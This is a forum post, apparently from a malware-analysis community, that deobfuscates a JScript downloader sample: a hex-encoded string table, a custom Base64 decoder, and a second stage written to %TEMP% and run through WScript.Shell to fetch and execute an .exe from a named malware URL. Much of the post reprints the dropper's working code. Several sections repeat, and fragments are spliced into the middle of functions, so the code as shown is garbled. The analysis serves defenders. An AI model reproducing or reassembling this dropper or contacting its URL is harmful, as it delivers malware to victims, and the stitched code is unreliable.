- May 14, 2016
- 1,597
From : https://malwaretips.com/threads/31-8-16-6.62930/
Thanks to @Solarquest)
Sample 5:
5 document_iWMYTy.js
1/56
Antivirus scan for f2b23bb90176ea682246d191c47d5ce890d1362b51316f7f4862d165c3bac11c at 2016-09-05 10:39:45 UTC - VirusTotal
Why this sample ?
Obfuscation Method never analysed by me at MT.
1) What it looks like :
It could appears complicated, but doing like on my previous analysis, we will see it's not too hard to understand.
2) Looking for the important parts :
Always separate the functions, from the other values :
2-1) The tab :
var TmOQLQMiKBSHZM = [];
A tab with unescape unicode
Real content :
What looks like strange strings, are in fact used later by the script, when needed.
Several different manipulations are done to deobfuscate "strings" , in this sample.
One example for the moment :
"PoqenCjbNUOCtd*ZcAHzCdKaOITn*w*lqmOs*scrip*AlkhTmE*wxjsk*NpvTpRkvn*t.e*CsjMH*xe
caIjqKdglgHJ = new String();
var llstSfBy = new Date();
while (true) {
}WScript.Sleep(1000);
}
The script wait 5 seconds and then create a tab of chars :
var tQsqVjHOaCz = jnMWjogwsmcQ("kPgd2VvM2FOl09BdQdnlVTgu1NrnJ32N2F2wTeQhKFnvRVU313rXSV5319N74q2N2F2wTeQhKOIr098j4TOOQGBaV3riQGHjHkBuLRm7LG7mJS5CkPflJd8A2VU3Rsa84FEq0dQa1W2O0GIFSWIt23vsYEIp0sg30WEDRq8n1EElRTnA2FgBTT25AWYlR3YoXNvpSFYt1d85VdIKQtBsVUgKVFQ3XNY3XqYSQTgnRT5g4NE8SU8pYdUNRVQvRWUBQFYMPN2jQ3np1t2fVWQF2sgEPqO5TdrsTTEgTVgs0e29UVIqQEBr03IwUFUeTGUzYFauRNYdXd2t1TaWSqI8SGaMU3UqSdYdQEgh2V8EYVERUVrOTqvIAOYBTG25XT2rPqThKsOO2d2b2G2H1GgzUePfJSjazeY819BKArUdQ9ZCHEj9AGQq1kflKsQh1GIO1tQgYsTD0dUqKp3nLSZmLzCj0s2pKsnlYtLD1F8mHOqxkPgsXWH7UTUaRkqsLp15aMLtbmqJ2s8g0FTf2GIrYRN74mqJAVXfRs5UYNXD0FUDYtQfckquLMP5bkHqJRB91dU8ApjazeY819BBXU2kHkq7PdnjXqaeAR7gHzT7Rs5UYNXD0FUDYtQfbmqJ2dEoH3nBTd8qAVElUMrKArUdQO5BXU2kWSjazeY819B5QN
...
...
");
tQsqVjHOaCz will contains the special Base64 decoded string that contains very important parts:
I put in red and blue bold what may be well looked
Look at this function, called several times NLqcZ :
One example :
Payload :
URL:
var KkUfF = ["http: //djprestige.net/111000/logs/logs.php"];
var AaWC = BllcCgi() % KkUfF.length; => to obfuscate a bit more : get a random valid index
var LARhtiaoV=KkUfF[AaWC]; => retrieve the URL at index AaWC
=> the URL used will be "completely removed from the array of URLS
=> here : only one URL used => next loop, exit the script
=> LARhtiaoV = http://djprestige.net/111000/logs/logs.php
function nGQI(XKowap,LhcfAni){
nGQI(LARhtiaoV,CDKBT);
if (CDKBT.status == 100+100) { => 200 : HTTP OK
try {
UEMH++; => useless
KkUfF.splice (AaWC,460-459); => useless
3) When this hidden part is used ?
The all functions and part we have seen in 2) parts, are in a var, once decoded.
...
...
var tQsqVjHOaCz = jnMWjogwsmcQ("kPgd2VvM2FOl09BdQdnlVTgu1NrnJ32N2F2wTeQhKFnvRVU313rXSV5319N74q2N2F2wTeQhKOIr098j4TOOQGBaV3riQGHjHkBuLRm7LG7mJS5CkPflJd8A2VU3Rsa84FEq0dQa1W2O0GIFSWIt23vsYEIp0sg30WEDRq8n1EElRTnA2FgBTT25AWYlR3YoXNvpSFYt1d85VdIKQtBsVUgKVFQ3XNY3XqYSQTgnRT5g4NE8SU8pYdUNRVQvRWUBQFYMPN2jQ3np1t2fVWQF2sgEPqO5TdrsTTEgTVgs0e29UVIqQEBr03IwUFUeTGUzYFauRNYdXd2t1TaWSqI8SGaMU3UqSdYdQEgh2V8EYVERUVrOTqvIAOYBTG25XT2rPqThKsOO2d2b2G2H1GgzUePfJSjazeY819BK
...............................
dQl0R7gJOUmXUgOTO8qKdnO0d2qAzNgbtroYWQr1du7AFaBTWHx6PqJYeUDXtQg0su7QdgMYT5q4OQqYFabQrPf4V2VTrOcAN8lYE2mQUPgHG5oYWQr1du70dUtH3EM2FOsYU8cXdgOXtPf4V2VTrOcAN8lYE2mQUPgbtqaz7==");
This is what are called after, you must remember the first tab decoded :
var aEDGtMwt = function() {
var obWnumtlk = function() {
EXPLANATIONS :
cJsHVL(aEDGtMwt, dbusESbAHhk(), tQsqVjHOaCz); => third parameter, the hidden part on the long string we have seen before !
With :
- aEDGtMwt : File System Object
- dbusESbAHhk() : %TEMP%\dDhUJJXRFIby.js (=> String.fromCharCode(92) : \ )
In fact, the hidden part is written on a temp js file : dDhUJJXRFIby.js
AfzFZ(obWnumtlk, MACECTYk() + vieag() + String.fromCharCode(92) + TmOQLQMiKBSHZM[3] + FhMKtMKvYiYM());
=>
AfzFZ(obWnumtlk, MACECTYk() + vieag() + String.fromCharCode(92) + TmOQLQMiKBSHZM[3] + FhMKtMKvYiYM());
Can be simplified :
shell.Run("command here");
"script.exe " + "%TMP%\" + "dDhUJJXRFIby.js"
Run the new js file : dDhUJJXRFIby.js
This sample script :
- downloads the payload : xgRqdfZmFGoe.exe
- from http: //djprestige.net/111000/logs/logs.php
- runs it
5) Conclusion :
A lot of parts could be analysed to show all useless parts wrote to make hardest to understand the code. I won't details more than above, I think it was sufficient to understand the method used
If you have any question, I will be happy to answer
Thanks to @Solarquest)
Sample 5:
5 document_iWMYTy.js
1/56
Antivirus scan for f2b23bb90176ea682246d191c47d5ce890d1362b51316f7f4862d165c3bac11c at 2016-09-05 10:39:45 UTC - VirusTotal
Why this sample ?
Obfuscation Method never analysed by me at MT.
1) What it looks like :
function vieag() {
return obWnumtlk.ExpandEnvironmentStrings(omYcXJw())
}
function dbusESbAHhk() {
return obWnumtlk.ExpandEnvironmentStrings('%T' + 'MP%') + String.fromCharCode(92) + 'dDhUJJXRFIby.js'
}
var TmOQLQMiKBSHZM = [];
TmOQLQMiKBSHZM.push("\x6b" + "\x56" + "\x4d");
TmOQLQMiKBSHZM.push("\x53" + "\x63\x72\x69\x70\x74\x69\x6e\x67\x2e\x46\x69\x6c\x65\x53\x79\x73\x74\x65\x6d\x4f\x62\x6a\x65\x63\x74");
TmOQLQMiKBSHZM.push("\x57\x53\x63\x72\x69\x70\x74\x2e\x53\x68\x65\x6c\x6c");
TmOQLQMiKBSHZM.push("\x64\x44\x68\x55\x4a\x4a\x58\x52\x46\x49\x62\x79");
TmOQLQMiKBSHZM.push("");
TmOQLQMiKBSHZM.push("");
TmOQLQMiKBSHZM.push("\x72\x4a\x6b\x50\x6d\x48\x76\x69\x53\x4f\x74\x73\x4b\x4c\x2a\x25\x54\x2a\x54\x63\x44\x43\x50\x67\x4f\x64\x64\x79\x5a\x72\x56\x2a\x4b\x58\x67\x54\x69\x6d\x41\x66\x5a\x2a\x6d\x6e\x43\x48\x63\x75\x73\x75\x79\x71\x66\x4c\x51\x70\x2a\x4d\x2a\x55\x58\x75\x61\x72\x49\x4a\x76\x78\x2a\x50\x25\x2a\x78\x6c\x78\x64\x69\x71\x76\x4b");
TmOQLQMiKBSHZM.push("\x2a");
TmOQLQMiKBSHZM.push("\x50\x6f\x71\x65\x6e\x43\x6a\x62\x4e\x55\x4f\x43\x74\x64\x2a\x5a\x63\x41\x48\x7a\x43\x64\x4b\x61\x4f\x49\x54\x6e\x2a\x77\x2a\x6c\x71\x6d\x4f\x73\x2a\x73\x63\x72\x69\x70\x2a\x41\x6c\x6b\x68\x54\x6d\x45\x2a\x77\x78\x6a\x73\x6b\x2a\x4e\x70\x76\x54\x70\x52\x6b\x76\x6e\x2a\x74\x2e\x65\x2a\x43\x73\x6a\x4d\x48\x2a\x78\x65\x20\x2a\x59\x44\x65\x43\x4a\x4c\x66\x54\x72\x6c\x6b\x41\x76\x75");
TmOQLQMiKBSHZM.push("\x2a");
TmOQLQMiKBSHZM.push("\x2e\x2a\x65\x49\x61\x59\x49\x59\x6c\x64\x52\x72\x48\x75\x54\x2a\x47\x72\x76\x7a\x54\x2a\x6a\x2a\x42\x61\x6b\x74\x68\x69\x52\x2a\x43\x78\x72\x59\x6c\x52\x71\x2a\x73\x2a\x62\x66\x43\x68\x43\x6a\x67\x71\x4d\x4e\x6c\x54\x2a\x69\x4c\x65\x52\x5a\x59\x56\x45\x61\x68\x56\x75\x79");
TmOQLQMiKBSHZM.push("\x2a");
TmOQLQMiKBSHZM.push("\x72\x75\x6e");
function ZmDvKDROUbeY(mzSWDJgPXR, TTrBlYfs, miNczRxyhlryzl) {
caIjqKdglgHJ = new String();
var llstSfBy = new Date();
while (true) {
}WScript.Sleep(1000);
}
var tQsqVjHOaCz = jnMWjogwsmcQ("kPgd2VvM2FOl09BdQdnlVTgu1NrnJ32N2F2wTeQhKFnvRVU313rXSV5319N74q2N2F2wTeQhKOIr098j4TOOQGBaV3riQGHjHkBuLRm7LG7mJS5CkPflJd8A2VU3Rsa84FEq0dQa1W2O0GIFSWIt23vsYEIp0sg30WEDRq8n1EElRTnA2FgBTT25AWYlR3YoXNvpSFYt1d85VdIKQtBsVUgKVFQ3XNY3XqYSQTgnRT5g4NE8SU8pYdUNRVQvRWUBQFYMPN2jQ3np1t2fVWQF2sgEPqO5TdrsTTEgTVgs0e29UVIqQEBr03IwUFUeTGUzYFauRNYdXd2t1TaWSqI8SGaMU3UqSdYdQEgh2V8EYVERUVrOTqvIAOYBTG25XT2rPqThKsOO2d2b2G2H1GgzUePfJSjazeY819BK
...............................
dQl0R7gJOUmXUgOTO8qKdnO0d2qAzNgbtroYWQr1du7AFaBTWHx6PqJYeUDXtQg0su7QdgMYT5q4OQqYFabQrPf4V2VTrOcAN8lYE2mQUPgHG5oYWQr1du70dUtH3EM2FOsYU8cXdgOXtPf4V2VTrOcAN8lYE2mQUPgbtqaz7==");
var aEDGtMwt = function() {
return new /*nzknJaFEhAKPCE*/ ActiveXObject(TmOQLQMiKBSHZM[1]);
}();
var obWnumtlk = function() {
return WScript.CreateObject(TmOQLQMiKBSHZM[2]);
}();
cJsHVL(aEDGtMwt, dbusESbAHhk(), tQsqVjHOaCz);
AfzFZ(obWnumtlk, MACECTYk() + vieag() + String.fromCharCode(92) + TmOQLQMiKBSHZM[3] + FhMKtMKvYiYM());
function HUILQ(tiAiWOziPrDiGLmueE, ruDSpJjoOhOUdgUMIeWzHtiu) {
return tiAiWOziPrDiGLmueE.replace().indexOf(ruDSpJjoOhOUdgUMIeWzHtiu);
}
function UfqHaxTeCQG(HGvGWQ, nCVYGG) {
return HGvGWQ.charAt(nCVYGG);
}
function U(QnWoxb) {
return String.fromCharCode(QnWoxb);
}
function TglQpUJYnasMCzqPfgTwOSOz(lFrZgairLtIxc, nBovdQteoUBYexzKnxvEXzj) {
return String.fromCharCode(lFrZgairLtIxc, nBovdQteoUBYexzKnxvEXzj);
}
function rQlGTCjHRbJZnHat(YpgYd, iZjlYtirmkiRe, fCyitEoyAt) {
return String.fromCharCode(YpgYd, iZjlYtirmkiRe, fCyitEoyAt);
}
function jnMWjogwsmcQ(DMEuOowRNhVpr) {
var JqkRfASu = caIjqKdglgHJ.join(TmOQLQMiKBSHZM[4]);
var vEBNBCDIChAFPrCSrYS, UNZukwlBEmwIIUfPGGosxeq, gGalhxhiZQBIASErc, LvrhFZyNyrGsaqIJifC, HXgoXumRiuvv, MwYntz, AiPBbLknEwhGuevKCo, IoPdTYglGU, ziKcqJ = 0,
jxFGihBSHFlEz = TmOQLQMiKBSHZM[5];
do {
LvrhFZyNyrGsaqIJifC = HUILQ(JqkRfASu, UfqHaxTeCQG(DMEuOowRNhVpr, ziKcqJ++));
HXgoXumRiuvv = HUILQ(JqkRfASu, UfqHaxTeCQG(DMEuOowRNhVpr, ziKcqJ++));
MwYntz = HUILQ(JqkRfASu, UfqHaxTeCQG(DMEuOowRNhVpr, ziKcqJ++));
AiPBbLknEwhGuevKCo = HUILQ(JqkRfASu, UfqHaxTeCQG(DMEuOowRNhVpr, ziKcqJ++));
IoPdTYglGU = LvrhFZyNyrGsaqIJifC << 18 | HXgoXumRiuvv << 12 | MwYntz << 6 | AiPBbLknEwhGuevKCo;
vEBNBCDIChAFPrCSrYS = IoPdTYglGU >> 16 & 0xff;
UNZukwlBEmwIIUfPGGosxeq = IoPdTYglGU >> 8 & 0xff;
gGalhxhiZQBIASErc = IoPdTYglGU & 0xff;
if (MwYntz == 64) jxFGihBSHFlEz += U(vEBNBCDIChAFPrCSrYS);
else if (AiPBbLknEwhGuevKCo == 64) jxFGihBSHFlEz += TglQpUJYnasMCzqPfgTwOSOz(vEBNBCDIChAFPrCSrYS, UNZukwlBEmwIIUfPGGosxeq);
else jxFGihBSHFlEz += rQlGTCjHRbJZnHat(vEBNBCDIChAFPrCSrYS, UNZukwlBEmwIIUfPGGosxeq, gGalhxhiZQBIASErc);
} while (ziKcqJ < DMEuOowRNhVpr.length);
return jxFGihBSHFlEz;
}
function omYcXJw() {
return ZmDvKDROUbeY(TmOQLQMiKBSHZM[6], [1, 5, 7], TmOQLQMiKBSHZM[7]);
}
function MACECTYk() {
return ZmDvKDROUbeY(TmOQLQMiKBSHZM[8], [2, 4, 8, 10], TmOQLQMiKBSHZM[9]);
}
function FhMKtMKvYiYM() {
return ZmDvKDROUbeY(TmOQLQMiKBSHZM[10], [0, 3, 6], TmOQLQMiKBSHZM[11]);
}
function AfzFZ(EOJUGdwva, upIslkONuZdKS) {
var zbqgCbCVWwkid = [TmOQLQMiKBSHZM[12]];
EOJUGdwva[zbqgCbCVWwkid[0]]
(upIslkONuZdKS, 0x1, 0x0)
}
function cJsHVL(UvzvIA, VjTGaiNuUBPgF, mqUyTKyNSmm) {
var TpMPzXgtwzTg = XkEZqeLzGdBEgB(UvzvIA, VjTGaiNuUBPgF);
TpMPzXgtwzTg.WriteLine(mqUyTKyNSmm);
TpMPzXgtwzTg.Close();
}
function XkEZqeLzGdBEgB(miETtK, QADeBTGed) {
return miETtK.createtextfile(QADeBTGed, true);
}
return obWnumtlk.ExpandEnvironmentStrings(omYcXJw())
}
function dbusESbAHhk() {
return obWnumtlk.ExpandEnvironmentStrings('%T' + 'MP%') + String.fromCharCode(92) + 'dDhUJJXRFIby.js'
}
var TmOQLQMiKBSHZM = [];
TmOQLQMiKBSHZM.push("\x6b" + "\x56" + "\x4d");
TmOQLQMiKBSHZM.push("\x53" + "\x63\x72\x69\x70\x74\x69\x6e\x67\x2e\x46\x69\x6c\x65\x53\x79\x73\x74\x65\x6d\x4f\x62\x6a\x65\x63\x74");
TmOQLQMiKBSHZM.push("\x57\x53\x63\x72\x69\x70\x74\x2e\x53\x68\x65\x6c\x6c");
TmOQLQMiKBSHZM.push("\x64\x44\x68\x55\x4a\x4a\x58\x52\x46\x49\x62\x79");
TmOQLQMiKBSHZM.push("");
TmOQLQMiKBSHZM.push("");
TmOQLQMiKBSHZM.push("\x72\x4a\x6b\x50\x6d\x48\x76\x69\x53\x4f\x74\x73\x4b\x4c\x2a\x25\x54\x2a\x54\x63\x44\x43\x50\x67\x4f\x64\x64\x79\x5a\x72\x56\x2a\x4b\x58\x67\x54\x69\x6d\x41\x66\x5a\x2a\x6d\x6e\x43\x48\x63\x75\x73\x75\x79\x71\x66\x4c\x51\x70\x2a\x4d\x2a\x55\x58\x75\x61\x72\x49\x4a\x76\x78\x2a\x50\x25\x2a\x78\x6c\x78\x64\x69\x71\x76\x4b");
TmOQLQMiKBSHZM.push("\x2a");
TmOQLQMiKBSHZM.push("\x50\x6f\x71\x65\x6e\x43\x6a\x62\x4e\x55\x4f\x43\x74\x64\x2a\x5a\x63\x41\x48\x7a\x43\x64\x4b\x61\x4f\x49\x54\x6e\x2a\x77\x2a\x6c\x71\x6d\x4f\x73\x2a\x73\x63\x72\x69\x70\x2a\x41\x6c\x6b\x68\x54\x6d\x45\x2a\x77\x78\x6a\x73\x6b\x2a\x4e\x70\x76\x54\x70\x52\x6b\x76\x6e\x2a\x74\x2e\x65\x2a\x43\x73\x6a\x4d\x48\x2a\x78\x65\x20\x2a\x59\x44\x65\x43\x4a\x4c\x66\x54\x72\x6c\x6b\x41\x76\x75");
TmOQLQMiKBSHZM.push("\x2a");
TmOQLQMiKBSHZM.push("\x2e\x2a\x65\x49\x61\x59\x49\x59\x6c\x64\x52\x72\x48\x75\x54\x2a\x47\x72\x76\x7a\x54\x2a\x6a\x2a\x42\x61\x6b\x74\x68\x69\x52\x2a\x43\x78\x72\x59\x6c\x52\x71\x2a\x73\x2a\x62\x66\x43\x68\x43\x6a\x67\x71\x4d\x4e\x6c\x54\x2a\x69\x4c\x65\x52\x5a\x59\x56\x45\x61\x68\x56\x75\x79");
TmOQLQMiKBSHZM.push("\x2a");
TmOQLQMiKBSHZM.push("\x72\x75\x6e");
function ZmDvKDROUbeY(mzSWDJgPXR, TTrBlYfs, miNczRxyhlryzl) {
fjgRFPuky = mzSWDJgPXR.split(miNczRxyhlryzl);
UjSexL = TmOQLQMiKBSHZM[0];
qKoHV = 0;
while (true) {
if (qKoHV >= TTrBlYfs.length) {
break;
}
UjSexL += fjgRFPuky[TTrBlYfs[qKoHV]];
qKoHV++;
}
return UjSexL.substring(3, UjSexL.length);
}UjSexL = TmOQLQMiKBSHZM[0];
qKoHV = 0;
while (true) {
if (qKoHV >= TTrBlYfs.length) {
break;
}
UjSexL += fjgRFPuky[TTrBlYfs[qKoHV]];
qKoHV++;
}
return UjSexL.substring(3, UjSexL.length);
caIjqKdglgHJ = new String();
var llstSfBy = new Date();
while (true) {
var dSbro = new Date();
var oZnEUHR = new Date(dSbro.getTime() - llstSfBy.getTime());
if (oZnEUHR.getSeconds() > 5) {
caIjqKdglgHJ =var oZnEUHR = new Date(dSbro.getTime() - llstSfBy.getTime());
if (oZnEUHR.getSeconds() > 5) {
["Z", "B", "z", "k", "3", "E", "F", "G", "H", "I", "J", "K", "L", "a", "b", "c", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "A", "0", "1", "2", "4", "6", "7", "8", "9", "M", "N", "O", "d", "e", "f", "g", "h", "i", "j", "5", "D", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "C", "+", "/", "="];
break;}
}
var tQsqVjHOaCz = jnMWjogwsmcQ("kPgd2VvM2FOl09BdQdnlVTgu1NrnJ32N2F2wTeQhKFnvRVU313rXSV5319N74q2N2F2wTeQhKOIr098j4TOOQGBaV3riQGHjHkBuLRm7LG7mJS5CkPflJd8A2VU3Rsa84FEq0dQa1W2O0GIFSWIt23vsYEIp0sg30WEDRq8n1EElRTnA2FgBTT25AWYlR3YoXNvpSFYt1d85VdIKQtBsVUgKVFQ3XNY3XqYSQTgnRT5g4NE8SU8pYdUNRVQvRWUBQFYMPN2jQ3np1t2fVWQF2sgEPqO5TdrsTTEgTVgs0e29UVIqQEBr03IwUFUeTGUzYFauRNYdXd2t1TaWSqI8SGaMU3UqSdYdQEgh2V8EYVERUVrOTqvIAOYBTG25XT2rPqThKsOO2d2b2G2H1GgzUePfJSjazeY819BK
...............................
dQl0R7gJOUmXUgOTO8qKdnO0d2qAzNgbtroYWQr1du7AFaBTWHx6PqJYeUDXtQg0su7QdgMYT5q4OQqYFabQrPf4V2VTrOcAN8lYE2mQUPgHG5oYWQr1du70dUtH3EM2FOsYU8cXdgOXtPf4V2VTrOcAN8lYE2mQUPgbtqaz7==");
var aEDGtMwt = function() {
return new /*nzknJaFEhAKPCE*/ ActiveXObject(TmOQLQMiKBSHZM[1]);
}();
var obWnumtlk = function() {
return WScript.CreateObject(TmOQLQMiKBSHZM[2]);
}();
cJsHVL(aEDGtMwt, dbusESbAHhk(), tQsqVjHOaCz);
AfzFZ(obWnumtlk, MACECTYk() + vieag() + String.fromCharCode(92) + TmOQLQMiKBSHZM[3] + FhMKtMKvYiYM());
function HUILQ(tiAiWOziPrDiGLmueE, ruDSpJjoOhOUdgUMIeWzHtiu) {
return tiAiWOziPrDiGLmueE.replace().indexOf(ruDSpJjoOhOUdgUMIeWzHtiu);
}
function UfqHaxTeCQG(HGvGWQ, nCVYGG) {
return HGvGWQ.charAt(nCVYGG);
}
function U(QnWoxb) {
return String.fromCharCode(QnWoxb);
}
function TglQpUJYnasMCzqPfgTwOSOz(lFrZgairLtIxc, nBovdQteoUBYexzKnxvEXzj) {
return String.fromCharCode(lFrZgairLtIxc, nBovdQteoUBYexzKnxvEXzj);
}
function rQlGTCjHRbJZnHat(YpgYd, iZjlYtirmkiRe, fCyitEoyAt) {
return String.fromCharCode(YpgYd, iZjlYtirmkiRe, fCyitEoyAt);
}
function jnMWjogwsmcQ(DMEuOowRNhVpr) {
var JqkRfASu = caIjqKdglgHJ.join(TmOQLQMiKBSHZM[4]);
var vEBNBCDIChAFPrCSrYS, UNZukwlBEmwIIUfPGGosxeq, gGalhxhiZQBIASErc, LvrhFZyNyrGsaqIJifC, HXgoXumRiuvv, MwYntz, AiPBbLknEwhGuevKCo, IoPdTYglGU, ziKcqJ = 0,
jxFGihBSHFlEz = TmOQLQMiKBSHZM[5];
do {
LvrhFZyNyrGsaqIJifC = HUILQ(JqkRfASu, UfqHaxTeCQG(DMEuOowRNhVpr, ziKcqJ++));
HXgoXumRiuvv = HUILQ(JqkRfASu, UfqHaxTeCQG(DMEuOowRNhVpr, ziKcqJ++));
MwYntz = HUILQ(JqkRfASu, UfqHaxTeCQG(DMEuOowRNhVpr, ziKcqJ++));
AiPBbLknEwhGuevKCo = HUILQ(JqkRfASu, UfqHaxTeCQG(DMEuOowRNhVpr, ziKcqJ++));
IoPdTYglGU = LvrhFZyNyrGsaqIJifC << 18 | HXgoXumRiuvv << 12 | MwYntz << 6 | AiPBbLknEwhGuevKCo;
vEBNBCDIChAFPrCSrYS = IoPdTYglGU >> 16 & 0xff;
UNZukwlBEmwIIUfPGGosxeq = IoPdTYglGU >> 8 & 0xff;
gGalhxhiZQBIASErc = IoPdTYglGU & 0xff;
if (MwYntz == 64) jxFGihBSHFlEz += U(vEBNBCDIChAFPrCSrYS);
else if (AiPBbLknEwhGuevKCo == 64) jxFGihBSHFlEz += TglQpUJYnasMCzqPfgTwOSOz(vEBNBCDIChAFPrCSrYS, UNZukwlBEmwIIUfPGGosxeq);
else jxFGihBSHFlEz += rQlGTCjHRbJZnHat(vEBNBCDIChAFPrCSrYS, UNZukwlBEmwIIUfPGGosxeq, gGalhxhiZQBIASErc);
} while (ziKcqJ < DMEuOowRNhVpr.length);
return jxFGihBSHFlEz;
}
function omYcXJw() {
return ZmDvKDROUbeY(TmOQLQMiKBSHZM[6], [1, 5, 7], TmOQLQMiKBSHZM[7]);
}
function MACECTYk() {
return ZmDvKDROUbeY(TmOQLQMiKBSHZM[8], [2, 4, 8, 10], TmOQLQMiKBSHZM[9]);
}
function FhMKtMKvYiYM() {
return ZmDvKDROUbeY(TmOQLQMiKBSHZM[10], [0, 3, 6], TmOQLQMiKBSHZM[11]);
}
function AfzFZ(EOJUGdwva, upIslkONuZdKS) {
var zbqgCbCVWwkid = [TmOQLQMiKBSHZM[12]];
EOJUGdwva[zbqgCbCVWwkid[0]]
(upIslkONuZdKS, 0x1, 0x0)
}
function cJsHVL(UvzvIA, VjTGaiNuUBPgF, mqUyTKyNSmm) {
var TpMPzXgtwzTg = XkEZqeLzGdBEgB(UvzvIA, VjTGaiNuUBPgF);
TpMPzXgtwzTg.WriteLine(mqUyTKyNSmm);
TpMPzXgtwzTg.Close();
}
function XkEZqeLzGdBEgB(miETtK, QADeBTGed) {
return miETtK.createtextfile(QADeBTGed, true);
}
2) Looking for the important parts :
Always separate the functions, from the other values :
2-1) The tab :
var TmOQLQMiKBSHZM = [];
TmOQLQMiKBSHZM.push("\x6b" + "\x56" + "\x4d");
TmOQLQMiKBSHZM.push("\x53" + "\x63\x72\x69\x70\x74\x69\x6e\x67\x2e\x46\x69\x6c\x65\x53\x79\x73\x74\x65\x6d\x4f\x62\x6a\x65\x63\x74");
TmOQLQMiKBSHZM.push("\x57\x53\x63\x72\x69\x70\x74\x2e\x53\x68\x65\x6c\x6c");
TmOQLQMiKBSHZM.push("\x64\x44\x68\x55\x4a\x4a\x58\x52\x46\x49\x62\x79");
TmOQLQMiKBSHZM.push("");
TmOQLQMiKBSHZM.push("");
TmOQLQMiKBSHZM.push("\x72\x4a\x6b\x50\x6d\x48\x76\x69\x53\x4f\x74\x73\x4b\x4c\x2a\x25\x54\x2a\x54\x63\x44\x43\x50\x67\x4f\x64\x64\x79\x5a\x72\x56\x2a\x4b\x58\x67\x54\x69\x6d\x41\x66\x5a\x2a\x6d\x6e\x43\x48\x63\x75\x73\x75\x79\x71\x66\x4c\x51\x70\x2a\x4d\x2a\x55\x58\x75\x61\x72\x49\x4a\x76\x78\x2a\x50\x25\x2a\x78\x6c\x78\x64\x69\x71\x76\x4b");
TmOQLQMiKBSHZM.push("\x2a");
TmOQLQMiKBSHZM.push("\x50\x6f\x71\x65\x6e\x43\x6a\x62\x4e\x55\x4f\x43\x74\x64\x2a\x5a\x63\x41\x48\x7a\x43\x64\x4b\x61\x4f\x49\x54\x6e\x2a\x77\x2a\x6c\x71\x6d\x4f\x73\x2a\x73\x63\x72\x69\x70\x2a\x41\x6c\x6b\x68\x54\x6d\x45\x2a\x77\x78\x6a\x73\x6b\x2a\x4e\x70\x76\x54\x70\x52\x6b\x76\x6e\x2a\x74\x2e\x65\x2a\x43\x73\x6a\x4d\x48\x2a\x78\x65\x20\x2a\x59\x44\x65\x43\x4a\x4c\x66\x54\x72\x6c\x6b\x41\x76\x75");
TmOQLQMiKBSHZM.push("\x2a");
TmOQLQMiKBSHZM.push("\x2e\x2a\x65\x49\x61\x59\x49\x59\x6c\x64\x52\x72\x48\x75\x54\x2a\x47\x72\x76\x7a\x54\x2a\x6a\x2a\x42\x61\x6b\x74\x68\x69\x52\x2a\x43\x78\x72\x59\x6c\x52\x71\x2a\x73\x2a\x62\x66\x43\x68\x43\x6a\x67\x71\x4d\x4e\x6c\x54\x2a\x69\x4c\x65\x52\x5a\x59\x56\x45\x61\x68\x56\x75\x79");
TmOQLQMiKBSHZM.push("\x2a");
TmOQLQMiKBSHZM.push("\x72\x75\x6e");
TmOQLQMiKBSHZM.push("\x53" + "\x63\x72\x69\x70\x74\x69\x6e\x67\x2e\x46\x69\x6c\x65\x53\x79\x73\x74\x65\x6d\x4f\x62\x6a\x65\x63\x74");
TmOQLQMiKBSHZM.push("\x57\x53\x63\x72\x69\x70\x74\x2e\x53\x68\x65\x6c\x6c");
TmOQLQMiKBSHZM.push("\x64\x44\x68\x55\x4a\x4a\x58\x52\x46\x49\x62\x79");
TmOQLQMiKBSHZM.push("");
TmOQLQMiKBSHZM.push("");
TmOQLQMiKBSHZM.push("\x72\x4a\x6b\x50\x6d\x48\x76\x69\x53\x4f\x74\x73\x4b\x4c\x2a\x25\x54\x2a\x54\x63\x44\x43\x50\x67\x4f\x64\x64\x79\x5a\x72\x56\x2a\x4b\x58\x67\x54\x69\x6d\x41\x66\x5a\x2a\x6d\x6e\x43\x48\x63\x75\x73\x75\x79\x71\x66\x4c\x51\x70\x2a\x4d\x2a\x55\x58\x75\x61\x72\x49\x4a\x76\x78\x2a\x50\x25\x2a\x78\x6c\x78\x64\x69\x71\x76\x4b");
TmOQLQMiKBSHZM.push("\x2a");
TmOQLQMiKBSHZM.push("\x50\x6f\x71\x65\x6e\x43\x6a\x62\x4e\x55\x4f\x43\x74\x64\x2a\x5a\x63\x41\x48\x7a\x43\x64\x4b\x61\x4f\x49\x54\x6e\x2a\x77\x2a\x6c\x71\x6d\x4f\x73\x2a\x73\x63\x72\x69\x70\x2a\x41\x6c\x6b\x68\x54\x6d\x45\x2a\x77\x78\x6a\x73\x6b\x2a\x4e\x70\x76\x54\x70\x52\x6b\x76\x6e\x2a\x74\x2e\x65\x2a\x43\x73\x6a\x4d\x48\x2a\x78\x65\x20\x2a\x59\x44\x65\x43\x4a\x4c\x66\x54\x72\x6c\x6b\x41\x76\x75");
TmOQLQMiKBSHZM.push("\x2a");
TmOQLQMiKBSHZM.push("\x2e\x2a\x65\x49\x61\x59\x49\x59\x6c\x64\x52\x72\x48\x75\x54\x2a\x47\x72\x76\x7a\x54\x2a\x6a\x2a\x42\x61\x6b\x74\x68\x69\x52\x2a\x43\x78\x72\x59\x6c\x52\x71\x2a\x73\x2a\x62\x66\x43\x68\x43\x6a\x67\x71\x4d\x4e\x6c\x54\x2a\x69\x4c\x65\x52\x5a\x59\x56\x45\x61\x68\x56\x75\x79");
TmOQLQMiKBSHZM.push("\x2a");
TmOQLQMiKBSHZM.push("\x72\x75\x6e");
Real content :
"kVM"
"Scripting.FileSystemObject"
"WScript.Shell"
"dDhUJJXRFIby"
""
""
"rJkPmHviSOtsKL*%T*TcDCPgOddyZrV*KXgTimAfZ*mnCHcusuyqfLQp*M*UXuarIJvx*P%*xlxdiqvK"
"*"
"PoqenCjbNUOCtd*ZcAHzCdKaOITn*w*lqmOs*scrip*AlkhTmE*wxjsk*NpvTpRkvn*t.e*CsjMH*xe *YDeCJLfTrlkAvu"
"*"
".*eIaYIYldRrHuT*GrvzT*j*BakthiR*CxrYlRq*s*bfChCjgqMNlT*iLeRZYVEahVuy"
"*"
"run"
"Scripting.FileSystemObject"
"WScript.Shell"
"dDhUJJXRFIby"
""
""
"rJkPmHviSOtsKL*%T*TcDCPgOddyZrV*KXgTimAfZ*mnCHcusuyqfLQp*M*UXuarIJvx*P%*xlxdiqvK"
"*"
"PoqenCjbNUOCtd*ZcAHzCdKaOITn*w*lqmOs*scrip*AlkhTmE*wxjsk*NpvTpRkvn*t.e*CsjMH*xe *YDeCJLfTrlkAvu"
